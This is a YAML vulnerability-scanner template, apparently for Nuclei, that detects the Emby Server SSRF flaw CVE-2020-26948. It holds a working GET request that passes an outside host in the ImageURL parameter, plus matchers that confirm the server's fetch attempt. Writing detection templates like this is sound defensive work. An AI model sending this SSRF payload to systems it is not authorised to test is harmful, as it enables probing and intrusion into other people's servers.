28 lines
703 B
YAML
28 lines
703 B
YAML
id: CVE-2020-26948
|
|
|
|
info:
|
|
name: Emby Server SSRF
|
|
author: dwisiswant0
|
|
severity: critical
|
|
reference: https://github.com/btnz-k/emby_ssrf
|
|
description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.
|
|
tags: cve,cve2020,emby,jellyfin,ssrf
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 500
|
|
- type: word
|
|
words:
|
|
- "Name or service not known"
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "text/plain"
|
|
part: header
|